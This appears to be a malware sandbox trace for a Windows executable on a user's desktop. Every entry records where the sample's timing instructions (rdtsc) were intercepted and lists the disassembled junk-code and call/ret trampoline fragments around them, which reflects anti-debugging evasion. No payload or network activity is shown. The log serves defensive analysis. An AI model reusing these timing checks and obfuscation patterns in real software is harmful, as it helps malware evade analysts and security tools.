Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B12E17 second address: B12E5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8ECh 0x00000007 jnp 00007FC750FDC8EAh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jns 00007FC750FDC8EEh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC750FDC8F9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B12FEC second address: B13003 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13125 second address: B1313B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC750FDC8E6h 0x0000000a jc 00007FC750FDC8E6h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1313B second address: B13143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B08949 second address: B0894D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B0894D second address: B08953 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B08953 second address: B08964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC750FDC8EBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B08964 second address: B08988 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC750B60C28h 0x00000008 jmp 00007FC750B60C33h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B08988 second address: B089A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8EBh 0x00000009 pop ecx 0x0000000a js 00007FC750FDC8EEh 0x00000010 pushad 0x00000011 popad 0x00000012 jo 00007FC750FDC8E6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B089A6 second address: B089BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC750B60C2Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B089BB second address: B089C5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC750FDC8E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13285 second address: B132A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C37h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B132A0 second address: B132AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B132AA second address: B132B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B132B0 second address: B132B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B132B4 second address: B132B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B139CA second address: B139CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B139CE second address: B139DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC750B60C26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B139DC second address: B139E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B139E5 second address: B13A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC750B60C2Dh 0x0000000f jg 00007FC750B60C3Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13A04 second address: B13A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8F1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13A19 second address: B13A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13B5B second address: B13BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jp 00007FC750FDC8E6h 0x00000014 popad 0x00000015 jmp 00007FC750FDC8EDh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC750FDC8EDh 0x00000022 pushad 0x00000023 push esi 0x00000024 pop esi 0x00000025 jo 00007FC750FDC8E6h 0x0000002b jmp 00007FC750FDC8F9h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13BB0 second address: B13BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FC750B60C39h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13BCF second address: B13BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8EEh 0x00000007 jmp 00007FC750FDC8EAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B13D4B second address: B13D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop ecx 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B180E9 second address: B180EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1E440 second address: B1E446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1E446 second address: B1E44C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1E44C second address: B1E45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC750B60C2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B1E71B second address: B1E73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC750FDC8F8h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B21511 second address: B21584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC750B60C3Eh 0x0000000e jmp 00007FC750B60C37h 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push ecx 0x00000019 jbe 00007FC750B60C2Ch 0x0000001f jno 00007FC750B60C26h 0x00000025 pop ecx 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 jmp 00007FC750B60C38h 0x0000002e push eax 0x0000002f push edx 0x00000030 jne 00007FC750B60C26h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B220D3 second address: B220D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B220D7 second address: B220EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FC750B60C2Ah 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B220EE second address: B220F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22146 second address: B22196 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC750B60C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007FC750B60C34h 0x00000011 pop edi 0x00000012 xchg eax, ebx 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FC750B60C28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22196 second address: B2219C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22667 second address: B2266B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22725 second address: B22729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22729 second address: B22733 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22733 second address: B22739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B22739 second address: B2273D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B236D3 second address: B236DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B236DF second address: B236E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2349A second address: B234C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC750FDC8ECh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jg 00007FC750FDC8ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B236E3 second address: B236ED instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B236ED second address: B23739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a cld 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FC750FDC8E8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 adc di, 0E0Ah 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 jnl 00007FC750FDC8E6h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B245A4 second address: B245A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B23E6B second address: B23E83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC750FDC8EBh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B24EB4 second address: B24F3E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC750B60C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC750B60C2Ch 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC750B60C2Bh 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FC750B60C28h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 push ebx 0x00000032 push ebx 0x00000033 pushad 0x00000034 popad 0x00000035 pop esi 0x00000036 pop esi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007FC750B60C28h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 mov esi, 09B80B8Dh 0x00000058 push 00000000h 0x0000005a xor di, 0BBBh 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 jmp 00007FC750B60C2Ch 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B24F3E second address: B24F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B24F44 second address: B24F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B24F48 second address: B24F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2584D second address: B25853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B25853 second address: B2585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2585F second address: B25865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B25865 second address: B2586A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2586A second address: B258A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC750B60C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d mov edi, dword ptr [ebp+122D199Eh] 0x00000013 push 00000000h 0x00000015 sub si, C1E9h 0x0000001a xchg eax, ebx 0x0000001b push edi 0x0000001c jmp 00007FC750B60C2Bh 0x00000021 pop edi 0x00000022 push eax 0x00000023 pushad 0x00000024 js 00007FC750B60C2Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B261E3 second address: B261E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B261E7 second address: B261ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B25FF5 second address: B26007 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jbe 00007FC750FDC8F0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B261ED second address: B261F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B261F1 second address: B26240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e xor edi, 7F847C08h 0x00000014 push 00000000h 0x00000016 stc 0x00000017 push 00000000h 0x00000019 clc 0x0000001a jmp 00007FC750FDC8F0h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC750FDC8F1h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B26240 second address: B26251 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC750B60C28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B26CE3 second address: B26CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B277F8 second address: B277FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B27575 second address: B2759A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC750FDC8FCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2759A second address: B275A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC750B60C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B294FF second address: B2956C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jnc 00007FC750FDC8FBh 0x0000000d nop 0x0000000e jl 00007FC750FDC8EAh 0x00000014 mov di, EA82h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FC750FDC8E8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D3580h] 0x0000003a push 00000000h 0x0000003c mov edi, dword ptr [ebp+122D2969h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push edx 0x00000046 jl 00007FC750FDC8E6h 0x0000004c pop edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2D5E6 second address: B2D5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B303DB second address: B303F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B296A3 second address: B296A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B296A9 second address: B296BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC750FDC8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2B667 second address: B2B685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750B60C33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2B685 second address: B2B68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2C6B1 second address: B2C6B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2C7A0 second address: B2C7B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC750FDC8F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2E873 second address: B2E879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2C7B4 second address: B2C7B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2E879 second address: B2E886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B3538D second address: B3539F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B3539F second address: B353A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	RDTSC instruction interceptor: First address: B2F601 second address: B2F605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
